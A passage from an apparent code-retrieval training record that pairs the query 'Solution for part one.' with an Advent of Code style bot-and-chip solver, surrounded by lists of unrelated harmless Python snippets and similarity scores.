n_games=1):\n t_max = env.spec.timestep_limit or 1000\n rewards = []\n\n for _ in range(n_games):\n s = env.reset()\n reward = 0.0\n for _ in range(t_max):\n action = agent.get_action(np.array([s]))\n s, r, done, _ = env.step(action)\n reward += r\n if done: break\n\n rewards.append(reward)\n\n return np.mean(rewards)", "def count_sheeps(arrayOfSheeps):\n count = 0\n for i in arrayOfSheeps:\n if i == True:\n count += 1\n return count", "def count(self, score_type=\"try\"):\n df = self.scores\n try:\n return df[df['type']==score_type].count()['value']\n except KeyError:\n return 0", "def summarize(allowances):\n total_allowances = 0\n if isinstance(allowances, dict):\n for key, value in allowances.items():\n total_allowances = total_allowances + int(value)\n #end for\n else:\n total_allowances = allowances\n return total_allowances", "def get_game_count(console_name: str) -> int:\n c = df.groupby('Platform')\n return c['Name'].count()[console_name]", "def ncusps(self):\n n = self.level()\n return sum([arith.euler_phi(arith.gcd(d,n//d)) for d in n.divisors()])", "def sixes_points(dice_list):\n return dice_list.count(6) * 6", "def _abilities_all_units(self) -> Counter:\n abilities_amount = Counter()\n for unit in self.units + self.structures: # type: Unit\n for order in unit.orders:\n abilities_amount[order.ability] += 1\n if not unit.is_ready:\n if self.race != Race.Terran or not unit.is_structure:\n # If an SCV is constructing a building, already_pending would count this structure twice\n # (once from the SCV order, and once from \"not structure.is_ready\")\n abilities_amount[self._game_data.units[unit.type_id.value].creation_ability] += 1\n\n return abilities_amount", "def test_count_neighbors(self):\n m, n = 5, 5\n k, p = 0.2, 0.7\n agents = [ConwayAgent(ii, ii & 0x1 == 1) for ii in range(m * n)]\n C = ConwayModel(m, n, k, p, agents)\n\n to_count = np.array([[0, 1, 0], [0, 0, 1], [1, 0, 0]])\n expected = np.array([[1, 1, 2], [2, 3, 1], [0, 2, 1]])\n result = C.count_neighbors(to_count)\n self.assertTrue(np.all(expected == result))", "def model_numel(model, param_dims=[2, 4], param_types=['weight', 'bias']):\n total_numel = 0\n for name, param in model.state_dict().items():\n # Extract just the actual parameter's name, which in this context we treat as its \"type\"\n if param.dim() in param_dims and any(type in name for type in param_types):\n total_numel += torch.numel(param)\n return total_numel", "def _count_parties(data_set): #DEMOCRATS, THEN REPUBLICANS\r\n reps = 0\r\n dems = 0\r\n for data_point in data_set:\r\n if data_point.dat_party == \"R\": reps+=1\r\n if data_point.dat_party == \"D\": dems+=1\r\n\r\n return (dems, reps)", "def count_umls(self) -> int:\n return self._count_model(Umls)", "def monte_carlo_estimate(self,var,e,n):\n\t\tncpt = self.variables[var].cpt\n\t\tncount = dict((value,0) for value in ncpt.values())\n\t\tesum = 0\n\t\tfor iter in xrange(n):\n sample = self.monte_carlo_sample()\n if all(sample[key]==value for (key,value) in e.iteritems()):\n #sample agrees with e\n ncount[sample[var]] += 1\n esum += 1\n if esum==0: return 'Undefined'\n for value in ncount.iterkeys():\n ncount[value] = float(ncount[value])/float(esum)\n return ncount", "def _count_occupied_seats(grid: List[List[str]]) -> int:\n total = 0\n for row in grid:\n total += row.count('#')\n return total", "def experiment(agent, steps, runs, initialize=None):\n result = 0\n for r in range(runs):\n result += simulate(agent, steps, initialize)\n return result / runs", "def how_many(cls):\n #cls.population equivalent to Robot.population\n print(\"We have {:d} robots.\".format(cls.population))", "def comitentes_count(self):\n return self.expedientepersona_set.filter(comitente=True).count()", "def count_houses_delivered_with_robot(s):\n s_santa, s_robot = s[::2], s[1::2]\n deliveries_santa = make_deliveries(s_santa)\n deliveries_robot = make_deliveries(s_robot)\n all_deliveries = combine_dicts(deliveries_santa, deliveries_robot, lambda x,y: x+y, 0)\n return len(all_deliveries)", "def get_nucliators_num_and_proba(self):\n XY = self.XY\n TIMES = self.die_times\n # CHEN'S IMPLEMENTATION\n # nucliators = np.array([True for i in range(len(TIMES))])\n # leaders = np.array([-1 for i in range(len(TIMES))])\n # cells_idx_sorted_by_times = np.arange(0, len(TIMES), 1)\n # for cell_idx in cells_idx_sorted_by_times:\n # # nucliators[cell_idx] = True\n # cell_death = TIMES[cell_idx]\n # neighbors_prior_death = [True for i in range(len(self.neighbors_list[cell_idx]))]\n # for neighbor_idx in self.neighbors_list[cell_idx]:\n # # if nucliators[cell_idx] == True:\n # # break\n # neighbor_death = TIMES[neighbor_idx]\n # if cell_death > neighbor_death:# and leaders[cell_idx] == -1:\n # nucliators[cell_idx] = False\n # # leaders[cell_idx] = cell_idx\n # elif cell_death == neighbor_death and not nucliators[neighbor_idx]:\n # nucliators[cell_idx] = False\n # leaders[cell_idx] = cell_idx\n # else:\n # nucliators[cell_idx] = True\n # # if leaders[neighbor_idx] != -1:\n # # leaders[cell_idx] = leaders[neighbor_idx]\n #\n # self.nucliators = nucliators\n # self.nucliators_num = nucliators.sum()\n # self.nucliation_proba = self.nucliators_num / len(XY)\n\n # MY IMPLEMENTATION\n self.nucliators = self.nucliators_counter.calc_nucliators()\n self.nucliators_num = self.nucliators.sum()\n self.nucliation_proba = self.nucliators_num / len(self.XY)", "def compute_detection_counts(kinds, valid_mask, aoi_mask, scene_counts):\n scene_counts = np.maximum(scene_counts, 1)\n if len(kinds):\n pairs = (kinds == 'pair_trawlers')\n singles = (kinds == 'single_trawler')\n scales = (kinds == 'pair_trawlers') * 2 + (kinds == 'single_trawler')\n aoi_pts = round((scales * (valid_mask & aoi_mask) / scene_counts).sum(), 1) \n aoi_pairs = round((pairs * (valid_mask & aoi_mask) / scene_counts).sum(), 1) \n else:\n aoi_pts = aoi_pairs = 0\n return aoi_pts, aoi_pairs", "def _get_n_players(env):\n return len(env.action_space.spaces)", "def test_winners_per_type_num_players(self):\n type_of_player = [ss.Player, ss.LazyPlayer, ss.ResilientPlayer]\n sim = ss.Simulation(player_field=type_of_player)\n run = sim.winners_per_type()\n assert list(run.keys()) == ['Player', 'LazyPlayer', 'ResilientPlayer']" ]
[ "0.56811786", "0.5137774", "0.5076857", "0.503548", "0.4957199", "0.4900915", "0.48782182", "0.4876376", "0.48688662", "0.48500103", "0.47992226", "0.47777793", "0.475898", "0.4754263", "0.47437844", "0.47234103", "0.47161484", "0.4714737", "0.4711583", "0.47112495", "0.47099024", "0.4708766", "0.4707552", "0.47072753", "0.4702373", "0.46961015", "0.46789366", "0.46784815", "0.46740007", "0.46648973", "0.46633115", "0.46581325", "0.46530733", "0.46491018", "0.4634963", "0.46328086", "0.4631801", "0.46183288", "0.46117324", "0.45982337", "0.45978847", "0.45943323", "0.45886838", "0.45816198", "0.45783046", "0.4574515", "0.45697555", "0.45671365", "0.4560227", "0.455644", "0.45560116", "0.45514458", "0.45514458", "0.454704", "0.45442635", "0.4533238", "0.45314878", "0.45238632", "0.45184755", "0.4509524", "0.45068043", "0.45067278", "0.45049015", "0.4502042", "0.45015028", "0.44991258", "0.449658", "0.4496522", "0.44943836", "0.44933853", "0.44924906", "0.44920737", "0.44884667", "0.4486083", "0.44832602", "0.44806686", "0.4474009", "0.4473817", "0.44720852", "0.44700083", "0.44646037", "0.44636193", "0.44635388", "0.44607636", "0.44599816", "0.44572014", "0.44528887", "0.44504642", "0.4449807", "0.44427797", "0.44374096", "0.4436504", "0.443321", "0.44316962", "0.44298926", "0.4428097", "0.44253218", "0.44200775", "0.44184005", "0.44030118" ]
0.65967184
0
Solution for part one.
def solve_part_one(self): self.initialize_values_and_rules() current_bot = None ret = None while True: for k in self.bots: if len(self.bots[k]) == 2: current_bot = k if current_bot is None: break low_type, dest_low, high_type, dest_high = self.rules[current_bot] chips = sorted(self.bots[current_bot]) if chips[0] == 17 and chips[1] == 61: ret = current_bot del self.bots[current_bot] current_bot = None self.assign(low_type, dest_low, chips[0]) self.assign(high_type, dest_high, chips[1]) return ret
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def task4_1(self):\n\n pass", "def exo2():", "def task4(self):\n\n pass", "def substantiate():", "def apply(self) -> None:", "def apply(self) -> None:", "def support(self):", "def mezclar_bolsa(self):", "def solve(self):", "def solvate(self):\n\n pass", "def falcon():", "def exercise_b2_106():\r\n pass", "def CL(self):", "def task3(self):\n\n pass", "def result(self):", "def result(self):", "def apply(self):", "def use(self):", "def exercise_b2_113():\r\n pass", "def process(self):", "def process(self):", "def process(self):", "def task5(self):\n\n pass", "def solve(self):\n ...", "def part1(_input):\n\n return None", "def main(self):", "def exercise_b2_107():\r\n pass", "def exercise_b2_52():\r\n pass", "def exercise_b2_69():\r\n pass", "def exercise_b2_53():\r\n pass", "def part_2():\n pass", "def degibber(self):", "def preprocess(self):", "def problem_298():\n pass", "def common(self):", "def exercise_b2_82():\r\n pass", "def decide():", "def part_5a():\n\n raise NotImplementedError", "def exercise_b2_70():\r\n pass", "def task1(self):\n \n pass", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def firstFunction(self):", "def one(self):", "def regular(self):", "def exercise_b2_27():\r\n pass", "def get_sol(self):", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def solve(self):\n pass", "def solve(self):\n pass", "def _build(self):", "def _build(self):", "def part2(_input):\n\n return None", "def part_6():\n\n raise NotImplementedError", "def _build_impl(self):", "def transform(self):", "def _regr_basic():", "def _prepare(self):", "def _prepare(self):", "def solution(self) -> State:", "def implement(self):\n\t#@DEBUG remove comments", "def _optimise(self):\n pass", "def exercise_b2_98():\r\n pass", "def __call__(self) -> None:", "def exercise_b2_43():\r\n pass", "def MINET(self):", "def pick_up(self):", "def task2(self):\n\n pass", "def test_get_solution(self):\n pass", "def input(self):", "def project(self, X):", "def project(self, X):" ]
[ "0.67894316", "0.6702227", "0.64681834", "0.6225672", "0.62181926", "0.62181926", "0.6214918", "0.62091845", "0.61323327", "0.6128199", "0.6067991", "0.60675985", "0.6043714", "0.602853", "0.60285074", "0.60285074", "0.60218054", "0.6005739", "0.5983086", "0.5963465", "0.5963465", "0.5963465", "0.5958028", "0.5914259", "0.5907054", "0.58979076", "0.58809215", "0.5875311", "0.58694124", "0.58687425", "0.58665264", "0.58538747", "0.5838984", "0.58384234", "0.58328587", "0.58266276", "0.578585", "0.57736856", "0.577261", "0.57643825", "0.57618344", "0.57618344", "0.57618344", "0.57618344", "0.57618344", "0.57618344", "0.57618344", "0.57618344", "0.57618344", "0.57618344", "0.5734593", "0.57321817", "0.57245797", "0.5713552", "0.57086414", "0.5693452", "0.5693452", "0.5693452", "0.5693452", "0.5693452", "0.5693452", "0.5693452", "0.5693452", "0.5693452", "0.5693452", "0.5693452", "0.5693452", "0.5693452", "0.5693452", "0.5693452", "0.5693452", "0.5693452", "0.5693452", "0.5693452", "0.5693452", "0.5693452", "0.5693452", "0.56871223", "0.56871223", "0.5652655", "0.5652655", "0.56507707", "0.56500196", "0.56415653", "0.56257284", "0.5614916", "0.5610619", "0.5610619", "0.5598211", "0.5597677", "0.55940604", "0.5591433", "0.55902135", "0.5589901", "0.5582843", "0.55777407", "0.5571332", "0.55670774", "0.55647516", "0.55645126", "0.55645126" ]
0.0
-1
Solution for part two.
def solve_part_two(self): return self.outputs[0] * self.outputs[1] * self.outputs[2]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def exercise_b2_113():\r\n pass", "def exo2():", "def exercise_b2_82():\r\n pass", "def exercise_b2_106():\r\n pass", "def exercise_b2_52():\r\n pass", "def exercise_b2_69():\r\n pass", "def exercise_b2_53():\r\n pass", "def exercise_b2_27():\r\n pass", "def exercise_b2_107():\r\n pass", "def exercise_b2_98():\r\n pass", "def exercise_b2_70():\r\n pass", "def exercise_b2_95():\r\n pass", "def exercise_b2_26():\r\n pass", "def exercise_b2_43():\r\n pass", "def part2(_input):\n\n return None", "def exercise_b2_93():\r\n pass", "def two(self):", "def exercise_b2_39():\r\n pass", "def exercise_b2_56():\r\n pass", "def solve(self):", "def exercise_2b():\n\n return", "def task4_1(self):\n\n pass", "def exercise_b2_86():\r\n pass", "def substantiate():", "def part_2():\n pass", "def solution(s):", "def part1(_input):\n\n return None", "def solvate(self):\n\n pass", "def problem_298():\n pass", "def get_sol(self):", "def solution(self) -> State:", "def solve(self):\n ...", "def task4(self):\n\n pass", "def decide():", "def task2(self):\n\n pass", "def apply(self) -> None:", "def apply(self) -> None:", "def mezclar_bolsa(self):", "def prove_I2() -> Proof:\n # Optional Task 6.7a", "def solve(self):\n pass", "def solve(self):\n pass", "def task3(self):\n\n pass", "def apply(self):", "def part2a_0():\n xs = exampleInput\n phi = Counter({('-BEGIN-', '-FEAT-'): 1.0, ('-FEAT-', 'Beautiful'): 1.0, ('-FEAT-', 'PREV:-BEGIN-'): 1.0, ('-FEAT-', 'NEXT:2'): 1.0, ('-FEAT-', '-CAPITALIZED-'): 1.0, ('-FEAT-', '-POST-CAPITALIZED-'): 0.0})\n phi_ = submission.nerFeatureFunction(0, '-BEGIN-', '-FEAT-', xs)\n grader.requireIsTrue( Counters.approximateEquals(phi, phi_) )\n\n phi = Counter({('-FEAT-', '-SIZE-'): 1.0, ('-SIZE-', 'PREV:Beautiful'): 1.0, ('-SIZE-', 'NEXT:bedroom'): 1.0, ('-SIZE-', '-PRE-CAPITALIZED-'): 1.0, ('-SIZE-', '2'): 1.0, ('-SIZE-', '-POST-CAPITALIZED-'): 0.0, ('-SIZE-', '-CAPITALIZED-'): 0.0})\n phi_ = submission.nerFeatureFunction(1, '-FEAT-', '-SIZE-', xs)\n grader.requireIsTrue( Counters.approximateEquals(phi, phi_) )\n \n phi = Counter({('-SIZE-', '-SIZE-'): 1.0, ('-SIZE-', 'PREV:2'): 1.0, ('-SIZE-', 'bedroom'): 1.0, ('-SIZE-', 'NEXT:-END-'): 1.0, ('-SIZE-', '-CAPITALIZED-'): 0.0, ('-SIZE-', '-PRE-CAPITALIZED-'): 0.0})\n phi_ = submission.nerFeatureFunction(2, '-SIZE-', '-SIZE-', xs)\n grader.requireIsTrue( Counters.approximateEquals(phi, phi_) )", "def GetPoint2(self):\n ...", "def GetPoint2(self):\n ...", "def solution(self):\n return [(\"the\", 1579644)] * 100", "def main():\n data = read_data()\n print('Part one solution: {}'.format(part_one(data)))\n print('Part two solution: {}'.format(part_two(data)))", "def test_part_2(arguments, distance, output):\n assert part_2.solution(arguments, distance) == output", "def part_2(puzzle_input: Tuple[Number] = p1) -> Number:\n for (noun, verb) in permutations(range(len(p1)), 2):\n # Create a fresh copy for each run\n program = list(p1)\n restore_program(memory_updates={1: noun, 2: verb}, memory=program)\n c = Computer(program)\n c.run_program()\n if c.read(0) == 19_690_720:\n return 100 * noun + verb\n raise ExecutionError(\"Could not satisfy requirement\")", "def CL(self):", "def result(self):", "def result(self):", "def solve_2x2(self):\r\n # replace with your code\r\n assert self.row1_invariant(1), '2x2 Dont pass row1_invariant(1)'\r\n whole_move = ''\r\n current_position = self.current_position(0, 0)\r\n # print 'Zero position =', current_position\r\n counter = 0\r\n \r\n\r\n \r\n # if current_position == (0,0):\r\n # print (0,0)\r\n # move_to_00 = 'rdlu' \r\n if current_position == (0,1):\r\n # print (0,1)\r\n move_to_00 = 'l'\r\n if current_position == (1,0):\r\n # print (1,0)\r\n move_to_00 = 'u'\r\n if current_position == (1,1):\r\n # print (1,1)\r\n move_to_00 = 'ul'\r\n whole_move += move_to_00\r\n self.update_puzzle(move_to_00)\r\n # print self\r\n # print self.get_number(1,1) < self.get_number(1,0)\r\n \r\n while self.get_number(0,0) != 0 or self.get_number(0,1) != 1:\r\n \r\n # print 'Aloha in loop!'\r\n counter +=1\r\n move = 'rdlu'\r\n whole_move += move\r\n self.update_puzzle(move)\r\n # print self\r\n if counter >5:\r\n break\r\n return whole_move", "def solution(self):\n return [(\"the\", 1561900)] * 100", "def g(self):\n return 2", "def task5(self):\n\n pass", "def degibber(self):", "def task1(self):\n \n pass", "def _Schoof_mod2(self):\n if not self.b:\n result = 0\n _log.debug(\"(%d, 2) #\" % result)\n else:\n linearfactors = UniVarPolynomial({card(self.basefield):self.basefield.one, 1:-self.basefield.one}, self.basefield)\n if GCD(self.cubic, linearfactors).degree() == 0:\n result = 1\n _log.debug(\"(%d, 2) ##\" % result)\n else:\n result = 0\n _log.debug(\"(%d, 2) ###\" % result)\n return (result, 2)", "def test_part2_example1(example1):\n assert aoc.part2(example1) == 2 + 2 + 966 + 50346", "def 3Sat(B):", "def falcon():", "def calculate_output(self):", "def test_get_solution(self):\n pass", "def elementCom(Paire1,Paire2) :\n elem_com=\" \"\n elementPaire1=\" \"\n elementPaire2=\" \"\n p1 = Paire1[1]\n p2 = Paire2[1]\n if p1 != p2 :\n for i in range (2):\n for j in range (2):\n if p1[i] == p2[j]:\n elem_com = p1[i] \n elementPaire1 = p1[1-i] \n elementPaire2 = p2[1-j] \n return elem_com, elementPaire1, elementPaire2", "def solveOneStep(self):\n ### Student code goes here\n return True", "def exercise_4(inputs): # DO NOT CHANGE THIS LINE\n output = inputs\n\n return output # DO NOT CHANGE THIS LINE", "def problem_1b():\n # BEGIN_YOUR_ANSWER (our solution is 1 lines of code, but don't worry if you deviate from this)\n return 4\n # END_YOUR_ANSWER", "def SecondPart():\n return countAllBagsIn(targetBag, organizedBags)", "def testBeliefs2sk(self):", "def test_T2():\n infile = \"cisd/T2.in\"\n assert(os.path.exists(infile))\n with open(infile) as f:\n lines = f.readlines()\n assert(len(lines) == 10)\n\n hl1 = HirataLine(lines[0])\n assert(set(hl1.free_indices.split()) == set(\"p3 p4 h1 h2\".split()))\n assert(hl1.summation_indices == '')\n assert(hl1.prefactors == [\"+ 1.0 \"])\n assert(hl1.postfactors == ['v ( p3 p4 h1 h2 )'])\n assert(str(hl1) == lines[0].replace('\\n', ''))\n cl1 = Cc4sLine(hl1)\n assert(set(cl1.free_indices.split()) == set([\"c\", \"d\", \"i\", \"j\"]))\n assert(cl1.summation_indices == \"\")\n assert(cl1.prefactors == [\"+ 1.0 \"])\n assert(cl1.postfactors == ['Vabij[\"cdij\"]'])\n assert(cl1.to_cpp() == ['( + 1.0 ) * Vabij[\"cdij\"];'])\n\n hl8 = HirataLine(lines[7])\n assert(set(hl8.free_indices.split()) == set(\"p3 p4 h1 h2\".split()))\n assert(hl8.summation_indices == ' h6 p5 ')\n assert(\n hl8.prefactors == [\n '+ 1.0 ',\n '- 1.0 * P( p3 p4 h2 h1 => p4 p3 h2 h1 ) ',\n '- 1.0 * P( p3 p4 h2 h1 => p3 p4 h1 h2 ) ',\n '+ 1.0 * P( p3 p4 h2 h1 => p4 p3 h1 h2 ) '\n ]\n )\n assert(\n hl8.postfactors ==\n ['Sum ( h6 p5 )', 't ( p5 p3 h6 h2 )', 'v ( h6 p4 h1 p5 )']\n )\n assert(str(hl8) == lines[7].replace('\\n', ''))\n cl8 = Cc4sLine(hl8)\n assert(set(cl8.free_indices.split()) == set([\"c\", \"d\", \"i\", \"j\"]))\n assert(cl8.summation_indices == \" n e \")\n assert(\n cl8.prefactors ==\n ['+ 1.0 ',\n '- 1.0 * P( c d j i => d c j i ) ',\n '- 1.0 * P( c d j i => c d i j ) ',\n '+ 1.0 * P( c d j i => d c i j ) ']\n )\n assert(cl8.postfactors == ['Tabij[\"ecnj\"]', 'Viajb[\"ndie\"]'])\n assert(\n cl8.to_cpp() == [\n '( + 1.0 ) * Tabij[\"ecnj\"] * Viajb[\"ndie\"];',\n '( - 1.0 ) * Tabij[\"ednj\"] * Viajb[\"ncie\"];',\n '( - 1.0 ) * Tabij[\"ecni\"] * Viajb[\"ndje\"];',\n '( + 1.0 ) * Tabij[\"edni\"] * Viajb[\"ncje\"];'\n ]\n )", "def genPrimerPairs_3Ext(primer_length=20, anneal_length=10, GC_low=40, GC_high=60):\n\n print('Primers for 3\\' extension half-asstemers')\n\n\n forwTemplate5_3 = GenOligoGC(primer_length,GC_low, GC_high)\n \"\"\"re.match checks if the first 2 Nuc are GC in the forward and backwards direction\"\"\"\n while not (re.match(\"[GC]{2}\",str(forwTemplate5_3)) and\n re.match(\"[GC]{2}\", str(forwTemplate5_3[::-1])) and\n re.match(\"[GC]{2}\", str(forwTemplate5_3[8:10]))):\n\n forwTemplate5_3 = GenOligoGC(primer_length,GC_low, GC_high)\n\n forwTemp3_5 = forwTemplate5_3[::-1]\n forwPrimer5_3 = forwTemp3_5.complement()\n print(f\"Template Seq 3\\' - > 5\\': {forwTemp3_5}\")\n print(f\"ForwPrimer Seq 5\\' - > 3\\': {forwPrimer5_3}\")\n\n forwPrimer_L10 = forwPrimer5_3[10:]\n print(f\"Last 10 Nucleotides of forward primer: {forwPrimer_L10}\")\n\n revPrimer_L10 = GenOligoGC(10,GC_low, GC_high)\n while not re.match(\"[GC]{2}\",str(revPrimer_L10[::-1])):\n revPrimer_L10 = GenOligoGC(10,GC_low, GC_high)\n\n \"\"\"First 10 Nuc of rev primer must be identical to last 10 Nuc of forward Primer\"\"\"\n revPrimer5_3 = forwPrimer_L10 + revPrimer_L10\n\n print(f\"RevPrimer Seq 5\\' - > 3\\': {revPrimer5_3}\")\n\n return forwPrimer5_3, revPrimer5_3", "def part_two(puzzle: Puzzle) -> typing.Optional[typing.Union[str, int]]:\n for number_one, number_two in itertools.combinations(puzzle[\"set\"], 2):\n if (2020 - number_one - number_two) in puzzle[\"set\"]:\n return (2020 - number_one - number_two) * number_one * number_two", "def idealOpAmp():", "def common(self):", "def answer():\n for k in range(2,3000):\n for j in range(k-1,0,-1):\n pj, pk = P(j), P(k)\n #print( j, k, pj, pk )\n if isPent(pk-pj):\n #print( j, k, pj, pk, pk+pj, isPent(pk+pj), pk-pj )\n if isPent(pk+pj) and isPent(pk-pj):\n return pk-pj", "def bloqueio_2(tab,jog):\r\n jog*=-1\r\n return vitoria_1(tab,jog)", "def test_sw2():\n B1 = 100\n B2 = 200\n h = 18\n t = 1\n H = h + 2 * t\n E1 = 20000\n E2 = 10000\n sections = ((B1, t, 0, E1), (B2, t, h + t, E2))\n EI, top, bot = bm.EI(sections, E1)\n EIc = E1 * B1 * (H ** 3 - h ** 3) / 12\n assert 0.99 < EI / EIc < 1.01", "def pulp_smash():", "def _optimise(self):\n pass", "def prob2(N1, N2, P1, P2):\n raise NotImplementedError(\"Problem 2 Incomplete\")", "def firstFunction(self):", "def REC_2s():\n return 2", "def solution(self):\n return [(\"simple 1\", 1.),\n (\"simple 2\", 1.),\n (\"simple 3\", 1.),\n (\"simple 4\", 1.),\n (\"simple 5\", 1.),\n (\"simple 10\", 1.),\n (\"simple 15\", 1.),\n (\"thai 1\", 1.),\n (\"thai 2\", 1.),\n (\"thai 3\", 1.),\n (\"thai 4\", 1.),\n (\"thai 5\", 1.),\n (\"thai 10\", 1.),\n (\"thai 15\", 1.),\n ]", "def part1a_2():\n mediumCRF = submission.LinearChainCRF( [\"-FEAT-\", \"-SIZE-\"],\n submission.binaryFeatureFunction,\n Counter({\n (\"-FEAT-\", \"-SIZE-\") : 0.8,\n (\"-SIZE-\", \"-FEAT-\") : 0.5,\n (\"-SIZE-\", \"-SIZE-\") : 1.,\n (\"-FEAT-\", \"-FEAT-\") : 1.,\n (\"-FEAT-\", \"Beautiful\") : 1.,\n (\"-SIZE-\", \"Beautiful\") : 0.5,\n (\"-FEAT-\", \"house\") : 1.,\n (\"-SIZE-\", \"house\") : 0.5,\n (\"-FEAT-\", \"2\") : 0.5,\n (\"-SIZE-\", \"2\") : 1.0,\n (\"-FEAT-\", \"bedroom\") : 0.5,\n (\"-SIZE-\", \"bedroom\") : 1.0,}) )\n moreExampleInputs = [\n \"This is a Beautiful 2 bedroom\".split(),\n \"2 bedroom Beautiful house\".split(),\n ]\n moreExampleTags = [\n ['-FEAT-', '-FEAT-', '-FEAT-', '-FEAT-', '-SIZE-', '-SIZE-'],\n ['-SIZE-', '-SIZE-', '-FEAT-', '-FEAT-']\n ]\n for xs, ys in zip(moreExampleInputs, moreExampleTags):\n ys_ = submission.computeViterbi(mediumCRF, xs)\n grader.requireIsEqual( ys, ys_ )", "def _regr_basic():", "def step2(self):\n\t\tif self.b[self.k - 1] == 'a':\n\t\t\tif self.ends(\"ational\"): self.r(\"ate\")\n\t\t\telif self.ends(\"tional\"): self.r(\"tion\")\n\t\telif self.b[self.k - 1] == 'c':\n\t\t\tif self.ends(\"enci\"):\t self.r(\"ence\")\n\t\t\telif self.ends(\"anci\"): self.r(\"ance\")\n\t\telif self.b[self.k - 1] == 'e':\n\t\t\tif self.ends(\"izer\"):\t self.r(\"ize\")\n\t\telif self.b[self.k - 1] == 'l':\n\t\t\tif self.ends(\"bli\"):\t self.r(\"ble\") # --DEPARTURE--\n\t\t\t# To match the published algorithm, replace this phrase with\n\t\t\t#\tif self.ends(\"abli\"):\t self.r(\"able\")\n\t\t\telif self.ends(\"alli\"): self.r(\"al\")\n\t\t\telif self.ends(\"entli\"): self.r(\"ent\")\n\t\t\telif self.ends(\"eli\"):\t self.r(\"e\")\n\t\t\telif self.ends(\"ousli\"): self.r(\"ous\")\n\t\telif self.b[self.k - 1] == 'o':\n\t\t\tif self.ends(\"ization\"): self.r(\"ize\")\n\t\t\telif self.ends(\"ation\"): self.r(\"ate\")\n\t\t\telif self.ends(\"ator\"): self.r(\"ate\")\n\t\telif self.b[self.k - 1] == 's':\n\t\t\tif self.ends(\"alism\"):\t self.r(\"al\")\n\t\t\telif self.ends(\"iveness\"): self.r(\"ive\")\n\t\t\telif self.ends(\"fulness\"): self.r(\"ful\")\n\t\t\telif self.ends(\"ousness\"): self.r(\"ous\")\n\t\telif self.b[self.k - 1] == 't':\n\t\t\tif self.ends(\"aliti\"):\t self.r(\"al\")\n\t\t\telif self.ends(\"iviti\"): self.r(\"ive\")\n\t\t\telif self.ends(\"biliti\"): self.r(\"ble\")\n\t\telif self.b[self.k - 1] == 'g': # --DEPARTURE--\n\t\t\tif self.ends(\"logi\"):\t self.r(\"log\")\n\t\t# To match the published algorithm, delete this phrase", "def merge_two_calls(self) -> None:", "def test_problem2():\n print('Testing problem2. The next line should be 18, 23536, 61, 5')\n print(problem2(4, 2), end=', ')\n print(problem2(105, 2), end=', ')\n print(problem2(2, 5), end=', ')\n print(problem2(2, 2))", "def regular(self):", "def part_5a():\n\n raise NotImplementedError", "def qst2(self):\n self.success = False", "def calculate(self):", "def genPrimerPairs_5Ext(primer_length=20, anneal_length=10, GC_low=40, GC_high=60):\n\n print('Primers for 5\\' extension half-asstemers')\n\n forwTemplate5_3 = GenOligoGC(primer_length,GC_low, GC_high)\n \"\"\"re.match checks if the first 2 Nuc are GC in the forward and backwards direction\"\"\"\n while not (re.match(\"[GC]{2}\",str(forwTemplate5_3)) and\n re.match(\"[GC]{2}\", str(forwTemplate5_3[::-1])) and\n re.match(\"[GC]{2}\", str(forwTemplate5_3[10:12]))):\n\n forwTemplate5_3 = GenOligoGC(primer_length,GC_low, GC_high)\n\n forwTemp3_5 = forwTemplate5_3[::-1]\n forwPrimer5_3 = forwTemp3_5.complement()\n print(f\"Template Seq 3\\' - > 5\\': {forwTemp3_5}\")\n print(f\"ForwPrimer Seq 5\\' - > 3\\': {forwPrimer5_3}\")\n\n forwPrimer_f10 = forwPrimer5_3[:10]\n print(f\"First 10 Nucleotides of forward primer: {forwPrimer_f10}\")\n\n revPrimer_f10 = GenOligoGC(10,GC_low, GC_high)\n while not re.match(\"[GC]{2}\",str(revPrimer_f10)):\n revPrimer_f10 = GenOligoGC(10,GC_low, GC_high)\n\n revPrimer5_3 = revPrimer_f10 + forwPrimer_f10\n\n print(f\"RevPrimer Seq 5\\' - > 3\\': {revPrimer5_3}\")\n\n return forwPrimer5_3, revPrimer5_3", "def f1_score(self):", "def part1a_0():\n xs = exampleInput\n ys = exampleTags\n ys_ = submission.computeViterbi(simpleCRF, xs)\n grader.requireIsEqual( ys, ys_ )", "def part1_2(puzzle_input):\n [initial_state_string, configurations] = puzzle_input.split('\\n\\n')\n initial_state = re.sub('initial state: ', '', initial_state_string)\n rules_arr = configurations.split('\\n')\n rules = [re.split(' => ', line) for line in rules_arr]\n rules = {t[0]: t[1] for t in rules}\n current_state = '..........' + initial_state + '...............................................................................................................................................'\n for i in range(100): # After 100th cycle, the only change is that there is a '#' that shifts right\n next_generation_string = \"\"\n for index, pot in enumerate(current_state):\n if index == 0:\n temp_string = '..' + current_state[:3]\n elif index == 1:\n temp_string = '.' + current_state[:4]\n elif index == len(current_state) - 2:\n temp_string = current_state[-4:] + '.'\n elif index == len(current_state) - 1:\n temp_string = current_state[-3:] + '..'\n else:\n temp_string = current_state[index-2:index+3]\n if temp_string in rules:\n next_generation_string += rules[temp_string]\n else:\n next_generation_string += pot\n current_state = next_generation_string\n\n # For part 1\n part1_sum = 0\n if i == 19:\n for index, pot in enumerate(current_state):\n if pot == '#':\n part1_sum += index - 10\n print(part1_sum)\n\n # Part 2\n part2_sum = 0\n for index, pot in enumerate(current_state):\n if pot == '#':\n part2_sum += index - 10 + 50000000000 - 100\n print(part2_sum)", "def project(self, X):", "def project(self, X):" ]
